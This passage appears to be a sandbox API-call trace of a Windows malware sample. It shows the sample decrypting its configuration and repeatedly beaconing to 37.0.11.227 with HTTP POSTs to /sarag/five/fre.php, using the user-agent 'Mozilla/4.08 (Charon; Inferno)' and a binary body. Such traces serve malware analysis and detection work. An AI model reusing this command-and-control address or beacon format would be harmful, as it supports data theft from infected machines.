ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0226.534] GetProcessHeap () returned 0x690000 [0226.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0226.534] GetProcessHeap () returned 0x690000 [0226.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0226.536] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0226.538] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.538] GetProcessHeap () returned 0x690000 [0226.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0226.538] GetProcessHeap () returned 0x690000 [0226.539] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0226.539] GetProcessHeap () returned 0x690000 [0226.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0226.539] GetProcessHeap () returned 0x690000 [0226.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0226.539] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0226.542] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.542] GetProcessHeap () returned 0x690000 [0226.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0226.542] GetProcessHeap () returned 0x690000 [0226.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0226.543] send (s=0x5b4, buf=0x6ad508*, len=242, flags=0) returned 242 [0226.543] send (s=0x5b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0226.543] GetProcessHeap () returned 0x690000 [0226.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0226.543] recv (in: s=0x5b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0226.619] GetProcessHeap () returned 0x690000 [0226.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0226.619] GetProcessHeap () returned 0x690000 [0226.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0226.620] GetProcessHeap () returned 0x690000 [0226.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0226.620] GetProcessHeap () returned 0x690000 [0226.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0226.620] closesocket (s=0x5b4) returned 0 [0226.621] GetProcessHeap () returned 0x690000 [0226.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0226.621] GetProcessHeap () returned 0x690000 [0226.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0226.621] GetProcessHeap () returned 0x690000 [0226.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0226.622] GetProcessHeap () returned 0x690000 [0226.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0226.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x418) returned 0x5b4 [0226.625] Sleep (dwMilliseconds=0xea60) [0226.626] GetProcessHeap () returned 0x690000 [0226.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0226.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.627] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.633] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0226.987] GetProcessHeap () returned 0x690000 [0226.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0226.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.989] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0226.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.990] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.992] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.992] GetProcessHeap () returned 0x690000 [0226.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0226.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.994] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0226.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.994] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0226.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0226.996] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0226.996] GetProcessHeap () returned 0x690000 [0226.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0226.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.998] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.999] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.000] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.001] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.001] GetProcessHeap () returned 0x690000 [0227.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0227.001] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0227.001] GetProcessHeap () returned 0x690000 [0227.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0227.002] GetProcessHeap () returned 0x690000 [0227.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0227.002] GetProcessHeap () returned 0x690000 [0227.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0227.002] GetProcessHeap () returned 0x690000 [0227.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0227.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.016] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0227.059] GetProcessHeap () returned 0x690000 [0227.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0227.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.062] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0227.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.064] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.065] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.065] GetProcessHeap () returned 0x690000 [0227.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0227.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.068] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0227.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.069] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0227.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.070] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0227.070] GetProcessHeap () returned 0x690000 [0227.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0227.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.081] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0227.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.083] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0227.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.087] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0227.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.088] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0227.088] GetProcessHeap () returned 0x690000 [0227.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0227.088] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0227.088] GetProcessHeap () returned 0x690000 [0227.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0227.088] socket (af=2, type=1, protocol=6) returned 0x5b8 [0227.089] connect (s=0x5b8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0227.156] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0227.156] GetProcessHeap () returned 0x690000 [0227.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0227.156] GetProcessHeap () returned 0x690000 [0227.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0227.157] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0227.158] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0227.158] GetProcessHeap () returned 0x690000 [0227.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0227.159] GetProcessHeap () returned 0x690000 [0227.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0227.159] GetProcessHeap () returned 0x690000 [0227.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0227.159] GetProcessHeap () returned 0x690000 [0227.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0227.160] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0227.161] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0227.161] GetProcessHeap () returned 0x690000 [0227.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0227.161] GetProcessHeap () returned 0x690000 [0227.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0227.163] send (s=0x5b8, buf=0x6ad508*, len=242, flags=0) returned 242 [0227.163] send (s=0x5b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0227.163] GetProcessHeap () returned 0x690000 [0227.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0227.163] recv (in: s=0x5b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0227.239] GetProcessHeap () returned 0x690000 [0227.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0227.240] GetProcessHeap () returned 0x690000 [0227.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0227.241] GetProcessHeap () returned 0x690000 [0227.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0227.242] GetProcessHeap () returned 0x690000 [0227.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0227.242] closesocket (s=0x5b8) returned 0 [0227.243] GetProcessHeap () returned 0x690000 [0227.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0227.243] GetProcessHeap () returned 0x690000 [0227.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0227.243] GetProcessHeap () returned 0x690000 [0227.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0227.244] GetProcessHeap () returned 0x690000 [0227.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0227.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3b0) returned 0x5b8 [0227.254] Sleep (dwMilliseconds=0xea60) [0227.260] GetProcessHeap () returned 0x690000 [0227.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0227.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0227.395] GetProcessHeap () returned 0x690000 [0227.395] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0227.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.396] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0227.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.409] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.546] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.546] GetProcessHeap () returned 0x690000 [0227.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0227.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.551] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0227.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.676] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0227.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.677] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0227.677] GetProcessHeap () returned 0x690000 [0227.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0227.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.794] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.795] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.800] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.803] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.807] GetProcessHeap () returned 0x690000 [0227.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0227.812] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0227.817] GetProcessHeap () returned 0x690000 [0227.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0227.817] GetProcessHeap () returned 0x690000 [0227.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0227.817] GetProcessHeap () returned 0x690000 [0227.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0227.818] GetProcessHeap () returned 0x690000 [0227.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0227.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.819] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0227.837] GetProcessHeap () returned 0x690000 [0227.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0227.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.838] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0227.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.839] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.840] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.840] GetProcessHeap () returned 0x690000 [0227.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0227.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.842] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0227.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.843] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0227.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.844] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0227.844] GetProcessHeap () returned 0x690000 [0227.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0227.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.847] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0227.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.849] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0227.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.850] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0227.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.851] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0227.851] GetProcessHeap () returned 0x690000 [0227.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0227.851] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0227.851] GetProcessHeap () returned 0x690000 [0227.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0227.851] socket (af=2, type=1, protocol=6) returned 0x5bc [0227.851] connect (s=0x5bc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0227.876] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0227.876] GetProcessHeap () returned 0x690000 [0227.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0227.876] GetProcessHeap () returned 0x690000 [0227.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0227.877] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0227.878] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0227.878] GetProcessHeap () returned 0x690000 [0227.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0227.878] GetProcessHeap () returned 0x690000 [0227.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0227.879] 